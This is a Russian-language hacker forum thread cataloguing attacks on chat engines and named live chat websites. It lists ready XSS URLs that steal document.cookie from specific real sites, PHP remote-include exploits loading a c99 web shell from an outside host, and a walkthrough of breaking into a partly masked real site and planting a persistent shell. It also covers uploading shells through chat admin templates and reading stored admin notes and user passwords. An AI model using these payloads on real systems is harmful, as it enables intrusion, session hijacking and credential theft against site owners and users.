![]() |
Уязвимости чатов и Движков
------------------------- Vodoo CHAT --------------------------- Type:[XSS]Product: Voodoo chat Author: qBiN Exploit: Код:
http://site.com/chat/go.php?url=javascript:alert(/Tested%20by%20qBiN/);с помощью сокетов. ------------------------------ Type:[XSS] Product: Voodoo chat Author: qBiN Exploit: Код:
http://sitename/chat/password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN test/);%3C/script%3EType:[PHP Including] Product: Voodoo chat 1.0RC1b и возможно болие ранние версий. Источник: xakep.ru Пример: Код:
http://sitename.com/[ScriptPath]/index.php?file_path=http://SHELLURL.COM?Type:FLOODER Product: Voodoo chat Author: NaX[no]r† exploit: http://www.balartrating.ru/flood.zip ------------------------- ЧАТ БОРОДИНА --------------------------- Может матерьял немного стар но всёже http://antichat.ru/txt/chat_borodin/ Видео лежит здесь http://video.antichat.net/videos/chat_borodin.rar Уязвимость нашел: Morph Автор статьи: Morph ------------------------- NAROD Chat --------------------------- Type:[XSS]Product: NAROD Chat Author: [sL1p] Exploit: Passive XSS: Код:
http://www.yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert(document.cookie)</script>------------------------- Уязвимости конкретных чатов --------------------------- Type:[XSS] Product: www.bazar.co.ua Author: max_pain89 Exploit: Passive ХSS: Код:
http://www.bazar.co.ua/?error[]=<script>confirm(/xxx/)</script>Type:[XSS] Product: www.sibchat.ru Author: [sL1p], Kaban Exploit: Passive ХSS: Код:
http://www.sibchat.ru/gallery.php?sid='><script>alert(document.cookie)</script>Type:[XSS] Product: www.chatinez.zp.ua Author: [sL1p] Exploit: Passive XSS: Код:
http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cookie)</script>002, 003, 004, 005, 006, 007, 008, 009, 010, 011, 012, 013, 014, 015, 016 ------------------------------ Type:[XSS] Product: www.smchat.ru Author: [sL1p] Exploit: Passive XSS: Код:
http://www.smchat.ru/?key="><script>alert(document.cookie)</script>Type:[XSS] Product: www.chat.ru Author: [sL1p] Exploit: Passive XSS: Код:
http://www.chat.ru/user/register.html?dop10=default&confemail="><script>alert(document.cookie)</script>------------------------------ Type:[XSS] Product: www.krovatka.ru Author: [sL1p], blackybr Exploit: Passive XSS: Код:
http://klubnichka.krovatka.ru/k?f=45&newwin=1&id2=5816&id=5673xee7kY1Y&c=8"><script>alert(document.cookie)</script>------------------------------ Type:[XSS] Product: www.chatcity.ru Author: [sL1p] Код:
http://www.Chat ID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn="><script>alert(document.cookie)</script>------------------------------ P.s Если есть какието узявимости по движкам чатов или по каким-то конкретным чатам пишите мне в ПМ я добавлю суда. |
[PHP include] в Флеш Чате
<-------------------------------------------------------------------------------------------> Уязвимость существует из за прописанных двух инклудах в двух фчатовых файлах. Эти инклуды прописаны во всех версиях фчатов вплоть до версии 4.6.2 Вот эти файлы подвержены уязвимости:inc/cmses/aedatingCMS2.php inc/cmses/aedating4CMS.php Т.к. у меня на машине есть немало разных исходников всяких чатов, то конечно же у меня был и фчат. Открыв один из этих файлов, я увидел следующее: PHP код:
PHP код:
<-------------------------------------------------------------------------------------------> Внимание. Здесь будет сохранена полная конспирация подопытного сайта. Надеюсь зачем это сделано объяснять не надо. Итак заходим на наш сайт: http://www.f**.net Смотрим о_О. Обычный развлекательный сайт. Форум, чат, всякая мурня. В общем как обычно:-) Для начала находим там чат, форма входа в сам чат висит по адресу: http://www.f**.net/chat/ Лучше и не придумаешь;-) Т.к. уязвим файл inc/cmses/aedatingCMS2.php То мы заходим по адресу: http://www.f**.net/chat/inc/cmses/aedatingCMS2.php Нашему взору открываются Warning'и. Цитата:
Нам известно что узвим параметр dir[inc]. Его мы и используем. Таков будет начальный запрос: http://www.f**.net/chat/inc/cmses/aedatingCMS2.php?dir[inc]= Теперь осталось только прописать ссылку на шелл. Вот наш с99shell: http://slip-antichat.narod.ru/c99shell.txt Итог таков: http://www.f**.net/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://slip-antichat.narod.ru/c99shell.txt? Всё, шелл получен. Инклуд успешно произведён. Но наверно он нам нужен в каком то более надёжном месте? Я тоже так думаю:-) Создаём php файл в дерриктории: /home/f**/www/ Открывается небольшое поле, копируем туда весь код шелла, и сохраняем. Теперь наш шелл живёт по адресу: http://www.f**.net/futura.php Всё, мы закрепились на сайте уверенно;-) Теперь это будет F.a.q. по инклуду фчатов. <-------------------------------------------------------------------------------------------> Отдельный thx Tem |
SinChat 1.0 beta1
Type: [XSS] Product: SinChat Author: ZAMUT Passive XSS: Active XSS: Art-Soft Mini Chat! Type: [XSS] Product: Art-Soft Mini Chat! Author: ZAMUT Active XSS: Vuln code: |
PHP-SPB Из личного опыта решил написать кое что о чатах на движке Бородина и php-spb. Юзал первый раз 3 года назад. Сейчас вспомнил вдруг про некоторые уязвимости.1. Заливка шелла через админку чата Если у вас есть доступ к админке чата, то вы можете залить туда шелл следующим способом: Заходите в админку, открываете "HTML/JS/PHP шаблоны всех скинов", выбираете скин (желательно def, если стоит другой). Далее открываете файл __skin1.php (или __skin2.php). И вставляете туда php код шелла. Для того чтобы открыть его необходимо в браузере набрать: Код:
http://site/chat/skin/имя_каталога/__skin1.php2. Просмотр админских записей в модуле "Записная книжка в админке" В модуле "Записная книжка в админке" все работает по принципу: fopen, fread, fputs и fclose. Следовательно никакой шифровки записей нет и они хранятся в открытом виде в файле. По дефолту (как ставят 90% админов чатов) записная книжка хранится в директории: src с названием notebook.txt . Для чтения открываем: Код:
http://site/chat/src/notebook.txtОсобенно обратите внимание, что если используется новая админка (adminka Doom edition), то там адрес будет такой: Код:
http://site/chat/src/notebook_adm.dat3. Модуль "Антиреклама в чате" aka "Цензор" Просмотр того, что админы запретили писать в чате, думая, что это реклама. По дефолту данные хранятся и записываются в файл bwrds.dat в корне чата (большинство админов так и оставляют, из-за лени или непонимания кода модуля). Открываем из браузера: Код:
http://site/chat/bwrds.dat4. Просмотр ссылок, которые по идее могут видеть "только" админы с определенным уровнем доступа. В чате справа снизу есть маленький фрейм. От имени юзера мы можем видеть только обычные ссылки, которые для нас и предназначены. Но для модераторов и администраторов там есть специальные ссылки, которые юзерам недоступны. Для их просмотра делаем следующее: 4.1 Узнаем название директории, где хранится скин, который установлен в чате по-умолчанию: Открываем персональные настройки в чате, далее смотрим исходный код страницы и ищем код следующего содержания: Код:
<option value="dir_name" selected>по-умолчанию<option value="dir_name" selected>имя_скина</select>4.2 Открываем в браузере ссылку данного вида: Код:
http://site/chat/skin/dir_name/frame_more_admin.html5. "Чтение паролей при локальных инклудах на сайте или чате" Обнаружил совсем недавно данную уловку (около 4-ех месяцев назад). Секрет в том, что если помимо чата стоит сайт с уязвимостью php-injection или в самом чате есть такая. (главное - нужен локальный инклуд). Все пароли юзеров и админов чатов версии > 4.07, на движке php-spb хранятся в директориях daemon/db2 в файлах, с зашифрованным названием. ... При удаленном инклуде действуем так: 5.1 Узнаем какой файл нам нужен. Для этого ставим чат у себя на компе. Как это сделать можно почитать тут: Код:
http://php.spb.ru/chat/readme.html#win5.2 Далее просто вводим: Код:
http://site/chat/script.php?include=путь_до_этого_файла.db2"pass";s:19:"password"; password - это будет наш пароль. На данный момент пока все, что знал сам из личного опыта пользования чатами на этом движке :) (c) USAkid 2008 |
| Время: 23:25 |